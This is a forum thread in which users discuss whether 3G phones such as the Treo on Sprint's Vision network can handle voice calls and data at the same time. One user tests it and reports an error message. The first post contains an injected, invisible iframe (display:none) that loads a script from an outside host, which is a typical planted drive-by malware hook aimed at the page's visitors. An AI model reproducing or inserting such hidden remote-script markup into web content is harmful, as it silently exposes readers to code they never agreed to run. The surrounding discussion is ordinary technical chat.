+ Reply to Thread

3G data and voice at the same time?

Any of you 3G bleeding edgers out there try to use data services and talk at the same time? Is it possible?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Carl

Reportedly not on the TREO phone.

Something about only the phone or data application can use the serial application in the protocol stack at the same time.

I hope this is not true of all '3G' phones.

Keith

But the voice side does not do VoIP does it?
    Carl

Whether or not the phone and network uses VoIP or not I could not tell you factually, because I am not involved and have not read anything stating for sure.

True 3G is supposed to operate on VoIP and treat voice just like any other data.

The continuing current distinction between voice and data in billing and functionality makes me postulate that they do not yet use VoIP.

Keith

you can be online with the treo, and make a phone call at the same time....

Brooks

The answer is...It depends.

Like in so many other things, the answer to the question of simultanious voice and data is "it depends".

With Sprint's 3G/1xRTT network, you can be "logged in" and "signed on, and still receive a call. In fact, there have been many times where I have been surfing, and when I pause to read a page, I get a call.

The "it depends" answer comes from the fact that you can not send or receive data while you are talking on the phone, or vice versa. However, being connected isn't considered sending and receiving data.

Think of the I300 as having circuit based technology, when you are connected that is all the phone can do. Now, think of the 3G phones (I.E. the Treo and most likely all other Palm-based phones) as being packet-based. The connection between the phone is a virtual one, and as long as you aren't sending and receiving data your phone is free to take calls.

Now, if you are on a phone call, you can't go over to Blazer and start surfing. The Voice part is still circuit based, and ties up the wireless circuit. However, if you were downloading a big email file, you may miss a call also.

My understanding is that the phone just nails up and tears down circuits as needed by the transaction.

This is where all of the confusion about the "always on" data comes from. Because, with the Vision 3G service you are paying by the byte rather than by the minute, you can afford to just connect to the Sprint network and just leave it up all the time. This is where the time savings comes from, in that you don't have to connect each time you want to do anything. The connection just stays up. Even when you roam out of the service area, the data connection will automatically be there when you roam back in.

For me, no matter what device I am carrying(still carrying an I300), the device is a phone first, PDA/Internet access device second.

I have no idea how 3G works, I simply present the fact that if you are able to send data and voice at the same time, the voice must get priority, otherwise you will more than likely lose quality. FIFO doesn't cut it.

I have a whole lot of confidence in the fact that Sprint considered such when they put together their network....yea right, Vision is a send and receive picture solution, right??

:p

Fiske, have you used voice and data at the same time enough to notice whether or not the quality of the voice call degrades while using data services at the same time??? Possibly the data side slows down because the voice has priority??

just tested it out.... I was connected to the 3G network..... then received an incoming call.... answered the call, put it on speakerphone... the signal indicator says I'm still online, then I loaded blazer, it gives this error when data is trying to be transmitted...

"You will need to disconnect the voice call before attepting to send or receive data"

Brooks